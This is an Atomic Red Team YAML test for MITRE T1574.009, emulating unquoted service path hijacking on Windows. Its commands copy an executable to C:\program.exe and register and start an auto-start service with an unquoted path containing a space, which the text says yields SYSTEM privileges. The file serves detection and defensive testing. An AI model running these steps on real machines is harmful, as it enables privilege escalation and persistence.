Carrie Roberts
d4709021fb
* updating atomics count in README.md [ci skip] * wip * handle spaces in path * update readme * fix typo --------- Co-authored-by: publish bot <opensource@redcanary.com>
31 lines
1.5 KiB
YAML
31 lines
1.5 KiB
YAML
attack_technique: T1574.009
|
||
display_name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
|
||
atomic_tests:
|
||
- name: Execution of program.exe as service with unquoted service path
|
||
auto_generated_guid: 2770dea7-c50f-457b-84c4-c40a47460d9f
|
||
description: |
|
||
When a service is created whose executable path contains spaces and isn’t enclosed within quotes, leads to a vulnerability
|
||
known as Unquoted Service Path which allows a user to gain SYSTEM privileges.
|
||
In this case, if an executable program.exe in C:\ exists, C:\program.exe will be executed instead of test.exe in C:\Program Files\subfolder\test.exe.
|
||
supported_platforms:
|
||
- windows
|
||
input_arguments:
|
||
service_executable:
|
||
description: Path of the executable used for the service and as the hijacked program.exe
|
||
type: path
|
||
default: PathToAtomicsFolder\T1574.009\bin\WindowsServiceExample.exe
|
||
executor:
|
||
command: |
|
||
copy "#{service_executable}" "C:\Program Files\windows_service.exe"
|
||
copy "#{service_executable}" "C:\program.exe"
|
||
sc create "Example Service" binpath= "C:\Program Files\windows_service.exe" Displayname= "Example Service" start= auto
|
||
sc start "Example Service"
|
||
cleanup_command: |
|
||
sc stop "Example Service" >nul 2>&1
|
||
sc delete "Example Service" >nul 2>&1
|
||
del "C:\Program Files\windows_service.exe" >nul 2>&1
|
||
del "C:\program.exe" >nul 2>&1
|
||
del "C:\Time.log" >nul 2>&1
|
||
name: command_prompt
|
||
elevation_required: true
|